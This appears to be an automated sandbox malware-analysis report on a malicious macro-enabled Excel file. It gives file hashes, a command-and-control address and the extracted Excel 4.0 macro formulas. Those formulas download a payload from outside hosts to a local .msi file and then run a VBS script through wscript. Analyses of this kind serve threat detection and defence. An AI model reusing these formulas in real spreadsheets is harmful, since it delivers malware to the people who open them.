General

  • Target

    c71052a07793e02530aec47a6d64d2c6

  • Size

    6KB

  • MD5

    c71052a07793e02530aec47a6d64d2c6

  • SHA1

    169a258eb0f9dbf65aae98240f208e3d5a65cf8a

  • SHA256

    1fc22af3551c93d70a6e54d64efa07ad81e85c7d8212547a9e8c2ec93671fce8

  • SHA512

    ef823d1a4f9a3fa65cbb2f19bad29f890f3eb9b9f1e00d91b6f3528d9c975cc4a39cd9e0297cfdf9a780b608e1b58beb698b18177d5f54e64941319084431253

  • SSDEEP

    192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ypJL+GTf:N+uYM2wY1FYZb98ypJZTf

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • c71052a07793e02530aec47a6d64d2c6
    .xlsm office2007